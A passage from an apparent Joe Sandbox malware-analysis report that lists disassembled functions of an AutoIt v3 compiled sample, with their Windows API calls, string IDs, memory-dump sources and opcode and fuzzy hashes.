                                                • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E7B4A
                                                • GetClientRect.USER32(00000000,?), ref: 007E7B56
                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 007E7B90
                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E7BB2
                                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E7BC5
                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E7BD0
                                                • GlobalLock.KERNEL32(00000000), ref: 007E7BD9
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E7BE8
                                                • GlobalUnlock.KERNEL32(00000000), ref: 007E7BF1
                                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E7BF8
                                                • GlobalFree.KERNEL32(00000000), ref: 007E7C03
                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E7C15
                                                • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00802CAC,00000000), ref: 007E7C2B
                                                • GlobalFree.KERNEL32(00000000), ref: 007E7C3B
                                                • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 007E7C61
                                                • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 007E7C80
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E7CA2
                                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E7E8F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                • String ID: $AutoIt v3$DISPLAY$static
                                                • API String ID: 2211948467-2373415609
                                                • Opcode ID: d90cebe5d7808a9ef4d92fb264b5eb0fa2713fe500a242f449ef7353d6c5ea32
                                                • Instruction ID: 18f9c7818526551851a0429dd3f03da4249a9a32ccac39e834b9adb2a4e074fd
                                                • Opcode Fuzzy Hash: d90cebe5d7808a9ef4d92fb264b5eb0fa2713fe500a242f449ef7353d6c5ea32
                                                • Instruction Fuzzy Hash: 89025C71901109EFDB14DF69CC89EAE7BB9FF48310F148558F915AB2A1DB38AD01CB64
                                                Function 007F35D4 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CharUpperBuffW.USER32(?,?,007FF910), ref: 007F3690
                                                • IsWindowVisible.USER32(?), ref: 007F36B4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: BuffCharUpperVisibleWindow
                                                • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                • API String ID: 4105515805-45149045
                                                • Opcode ID: 2cc29c9a75d0898cc0b780cdb3c55a83293a598bb32f6609e13e5b66e1692f82
                                                • Instruction ID: b54d510cb593a4553d5b6475a665279da4a3e80581180c1d472d71f5ebbf4d15
                                                • Opcode Fuzzy Hash: 2cc29c9a75d0898cc0b780cdb3c55a83293a598bb32f6609e13e5b66e1692f82
                                                • Instruction Fuzzy Hash: 23D1A430214605DFCF14EF10C495ABA77A5EF95394F04845CFA869B3A2CB38EE4ACB91
                                                Function 007FA60C Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetTextColor.GDI32(?,00000000), ref: 007FA662
                                                • GetSysColorBrush.USER32(0000000F), ref: 007FA693
                                                • GetSysColor.USER32(0000000F), ref: 007FA69F
                                                • SetBkColor.GDI32(?,000000FF), ref: 007FA6B9
                                                • SelectObject.GDI32(?,00000000), ref: 007FA6C8
                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 007FA6F3
                                                • GetSysColor.USER32(00000010), ref: 007FA6FB
                                                • CreateSolidBrush.GDI32(00000000), ref: 007FA702
                                                • FrameRect.USER32(?,?,00000000), ref: 007FA711
                                                • DeleteObject.GDI32(00000000), ref: 007FA718
                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 007FA763
                                                • FillRect.USER32(?,?,00000000), ref: 007FA795
                                                • GetWindowLongW.USER32(?,000000F0), ref: 007FA7C0
                                                  • Part of subcall function 007FA8FC: GetSysColor.USER32(00000012), ref: 007FA935
                                                  • Part of subcall function 007FA8FC: SetTextColor.GDI32(?,?), ref: 007FA939
                                                  • Part of subcall function 007FA8FC: GetSysColorBrush.USER32(0000000F), ref: 007FA94F
                                                  • Part of subcall function 007FA8FC: GetSysColor.USER32(0000000F), ref: 007FA95A
                                                  • Part of subcall function 007FA8FC: GetSysColor.USER32(00000011), ref: 007FA977
                                                  • Part of subcall function 007FA8FC: CreatePen.GDI32(00000000,00000001,00743C00), ref: 007FA985
                                                  • Part of subcall function 007FA8FC: SelectObject.GDI32(?,00000000), ref: 007FA996
                                                  • Part of subcall function 007FA8FC: SetBkColor.GDI32(?,00000000), ref: 007FA99F
                                                  • Part of subcall function 007FA8FC: SelectObject.GDI32(?,?), ref: 007FA9AC
                                                  • Part of subcall function 007FA8FC: InflateRect.USER32(?,000000FF,000000FF), ref: 007FA9CB
                                                  • Part of subcall function 007FA8FC: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007FA9E2
                                                  • Part of subcall function 007FA8FC: GetWindowLongW.USER32(00000000,000000F0), ref: 007FA9F7
                                                  • Part of subcall function 007FA8FC: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007FAA1F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                • String ID:
                                                • API String ID: 3521893082-0
                                                • Opcode ID: fbb58ed55028ef455f44c9cb55ebf735eb187e933f4a574cd3dee3e91830c186
                                                • Instruction ID: 35fce2d94a5b6accdece0789bcc6c6c6b0beb1b54ac74f9b058e2d2a6e21b2a8
                                                • Opcode Fuzzy Hash: fbb58ed55028ef455f44c9cb55ebf735eb187e933f4a574cd3dee3e91830c186
                                                • Instruction Fuzzy Hash: 58918FB1008305FFC710AF64DC48E6B7BA9FF88321F104A29F666D62A0DB79D944CB56
                                                Function 00772C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • DestroyWindow.USER32(?,?,?), ref: 00772CA2
                                                • DeleteObject.GDI32(00000000), ref: 00772CE8
                                                • DeleteObject.GDI32(00000000), ref: 00772CF3
                                                • DestroyIcon.USER32(00000000,?,?,?), ref: 00772CFE
                                                • DestroyWindow.USER32(00000000,?,?,?), ref: 00772D09
                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 007AC5BB
                                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 007AC5F4
                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 007ACA1D
                                                  • Part of subcall function 00771B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00772036,?,00000000,?,?,?,?,007716CB,00000000,?), ref: 00771B9A
                                                • SendMessageW.USER32(?,00001053), ref: 007ACA5A
                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 007ACA71
                                                • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 007ACA87
                                                • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 007ACA92
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                • String ID: 0
                                                • API String ID: 464785882-4108050209
                                                • Opcode ID: bf3ea5ac70e9d66c63448b5adb59d752c13af2c362bb0522d1377e92a1713a0b
                                                • Instruction ID: ae7a7e4850b3141127832a8f6db9f73ecf55ed450ad2a35f5f84ecd546c180be
                                                • Opcode Fuzzy Hash: bf3ea5ac70e9d66c63448b5adb59d752c13af2c362bb0522d1377e92a1713a0b
                                                • Instruction Fuzzy Hash: 1912A030600201EFDB26CF24C988BA9B7E5FF56340F548669F559DB262CB39EC52CB61
                                                Function 007E75C0 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • DestroyWindow.USER32(00000000), ref: 007E75F3
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 007E76B2
                                                • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 007E76F0
                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 007E7702
                                                • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 007E7748
                                                • GetClientRect.USER32(00000000,?), ref: 007E7754
                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 007E7798
                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 007E77A7
                                                • GetStockObject.GDI32(00000011), ref: 007E77B7
                                                • SelectObject.GDI32(00000000,00000000), ref: 007E77BB
                                                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 007E77CB
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007E77D4
                                                • DeleteDC.GDI32(00000000), ref: 007E77DD
                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007E7809
                                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 007E7820
                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 007E785B
                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 007E786F
                                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 007E7880
                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 007E78B0
                                                • GetStockObject.GDI32(00000011), ref: 007E78BB
                                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 007E78C6
                                                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 007E78D0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                • API String ID: 2910397461-517079104
                                                • Opcode ID: 2c8fe7e418eb187f8e1d837241e637c0786fa1c35577393d69654c698a81bdb3
                                                • Instruction ID: d17e8d2b60de3adc43a2bef4faf2da73c649e493f8f1ad6c2f0212e8676b5b31
                                                • Opcode Fuzzy Hash: 2c8fe7e418eb187f8e1d837241e637c0786fa1c35577393d69654c698a81bdb3
                                                • Instruction Fuzzy Hash: CDA16D71A41619BFEB14DBA4DC4AFBE7BA9EF48714F008114FA14A72E0DB74AD10CB64
                                                Function 007DAD9C Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 007DADAA
                                                • GetDriveTypeW.KERNEL32(?,007FFAC0,?,\\.\,007FF910), ref: 007DAE87
                                                • SetErrorMode.KERNEL32(00000000,007FFAC0,?,\\.\,007FF910), ref: 007DAFE5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ErrorMode$DriveType
                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                • API String ID: 2907320926-4222207086
                                                • Opcode ID: d4b93016b86cf98ee4baf7ee4df81164b19699644f31f58d4f97e9ae501631ae
                                                • Instruction ID: 4a77162f635d1e7dd7af50b0f846892e61f1c8fb8c1dc14267c56fb9127de5af
                                                • Opcode Fuzzy Hash: d4b93016b86cf98ee4baf7ee4df81164b19699644f31f58d4f97e9ae501631ae
                                                • Instruction Fuzzy Hash: 55517AB4649219FACF04EB10D9868B9B7B1FB0431072484ABE916E6390CF7CDD81DB93
                                                Function 00776A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: __wcsnicmp
                                                • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                • API String ID: 1038674560-86951937
                                                • Opcode ID: 0e8e1765e37cbf4f5ee05a67469cbe55b16de081b5fe9e25207a2f62d82a4ab3
                                                • Instruction ID: eb7f1b0366e94e26a6cf81e9a12209a59c5a4250468ef5f29938012890f57d3c
                                                • Opcode Fuzzy Hash: 0e8e1765e37cbf4f5ee05a67469cbe55b16de081b5fe9e25207a2f62d82a4ab3
                                                • Instruction Fuzzy Hash: D3814EB0600615FBDF20AF60DC4AFBE3768EF12754F148125F909A61D6EB6CDA51C291
                                                Function 007FA8FC Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetSysColor.USER32(00000012), ref: 007FA935
                                                • SetTextColor.GDI32(?,?), ref: 007FA939
                                                • GetSysColorBrush.USER32(0000000F), ref: 007FA94F
                                                • GetSysColor.USER32(0000000F), ref: 007FA95A
                                                • CreateSolidBrush.GDI32(?), ref: 007FA95F
                                                • GetSysColor.USER32(00000011), ref: 007FA977
                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 007FA985
                                                • SelectObject.GDI32(?,00000000), ref: 007FA996
                                                • SetBkColor.GDI32(?,00000000), ref: 007FA99F
                                                • SelectObject.GDI32(?,?), ref: 007FA9AC
                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 007FA9CB
                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007FA9E2
                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 007FA9F7
                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007FAA1F
                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 007FAA46
                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 007FAA64
                                                • DrawFocusRect.USER32(?,?), ref: 007FAA6F
                                                • GetSysColor.USER32(00000011), ref: 007FAA7D
                                                • SetTextColor.GDI32(?,00000000), ref: 007FAA85
                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 007FAA99
                                                • SelectObject.GDI32(?,007FA62C), ref: 007FAAB0
                                                • DeleteObject.GDI32(?), ref: 007FAABB
                                                • SelectObject.GDI32(?,?), ref: 007FAAC1
                                                • DeleteObject.GDI32(?), ref: 007FAAC6
                                                • SetTextColor.GDI32(?,?), ref: 007FAACC
                                                • SetBkColor.GDI32(?,?), ref: 007FAAD6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                • String ID:
                                                • API String ID: 1996641542-0
                                                • Opcode ID: 78a2110285e12ea238c3b19ae8bba2f9a593a2b9ed8c7a505dd2922ab6cdc72f
                                                • Instruction ID: 922e33e3acf48d5bc0ae467693876bba3a1caade129b4ac81a64c43bdf93c185
                                                • Opcode Fuzzy Hash: 78a2110285e12ea238c3b19ae8bba2f9a593a2b9ed8c7a505dd2922ab6cdc72f
                                                • Instruction Fuzzy Hash: 38511EB1900208FFDB119FA4DC48EAE7B79EF48320F118525FA15AB2A1DB799940DF54
                                                Function 007F8A07 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 007F8AF3
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007F8B04
                                                • CharNextW.USER32(0000014E), ref: 007F8B33
                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 007F8B74
                                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 007F8B8A
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007F8B9B
                                                • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 007F8BB8
                                                • SetWindowTextW.USER32(?,0000014E), ref: 007F8C0A
                                                • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 007F8C20
                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 007F8C51
                                                • _memset.LIBCMT ref: 007F8C76
                                                • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 007F8CBF
                                                • _memset.LIBCMT ref: 007F8D1E
                                                • SendMessageW.USER32(?,00001053,000000FF,?), ref: 007F8D48
                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 007F8DA0
                                                • SendMessageW.USER32(?,0000133D,?,?), ref: 007F8E4D
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 007F8E6F
                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007F8EB9
                                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007F8EE6
                                                • DrawMenuBar.USER32(?), ref: 007F8EF5
                                                • SetWindowTextW.USER32(?,0000014E), ref: 007F8F1D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                • String ID: 0
                                                • API String ID: 1073566785-4108050209
                                                • Opcode ID: 873ab9bb87d373a3432c087f39dc4e0f2a6dbe42d9168dc0294d2d138d4cabfa
                                                • Instruction ID: 7e12ca3f6031ee15ed22e9bcbd6447d787d3edf64f89a1226006395b6180a3f0
                                                • Opcode Fuzzy Hash: 873ab9bb87d373a3432c087f39dc4e0f2a6dbe42d9168dc0294d2d138d4cabfa
                                                • Instruction Fuzzy Hash: C3E15B7090120CAFDF609F65CC88EFE7BB9FF05750F108156FA15AA291DB788A81DB61
                                                Function 007F48F8 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCursorPos.USER32(?), ref: 007F4A33
                                                • GetDesktopWindow.USER32 ref: 007F4A48
                                                • GetWindowRect.USER32(00000000), ref: 007F4A4F
                                                • GetWindowLongW.USER32(?,000000F0), ref: 007F4AB1
                                                • DestroyWindow.USER32(?), ref: 007F4ADD
                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007F4B06
                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007F4B24
                                                • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 007F4B4A
                                                • SendMessageW.USER32(?,00000421,?,?), ref: 007F4B5F
                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 007F4B72
                                                • IsWindowVisible.USER32(?), ref: 007F4B92
                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 007F4BAD
                                                • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 007F4BC1
                                                • GetWindowRect.USER32(?,?), ref: 007F4BD9
                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 007F4BFF
                                                • GetMonitorInfoW.USER32(00000000,?), ref: 007F4C19
                                                • CopyRect.USER32(?,?), ref: 007F4C30
                                                • SendMessageW.USER32(?,00000412,00000000), ref: 007F4C9B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                • String ID: ($0$tooltips_class32
                                                • API String ID: 698492251-4156429822
                                                • Opcode ID: 0cab7c4a0106f75e5b8d1dbfce6081f91a68ed78f91be2d7c97d374ff872a16a
                                                • Instruction ID: a85e05e61cb089c703fc0cda5f2874ab110c6143811ee5b2d47c9e0fe2d49b9a
                                                • Opcode Fuzzy Hash: 0cab7c4a0106f75e5b8d1dbfce6081f91a68ed78f91be2d7c97d374ff872a16a
                                                • Instruction Fuzzy Hash: F1B14B71604341AFDB14DF64C889B6BBBE4FF88310F00891DF6999B2A1DB79E805CB95
                                                Function 007727D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007728BC
                                                • GetSystemMetrics.USER32(00000007), ref: 007728C4
                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007728EF
                                                • GetSystemMetrics.USER32(00000008), ref: 007728F7
                                                • GetSystemMetrics.USER32(00000004), ref: 0077291C
                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00772939
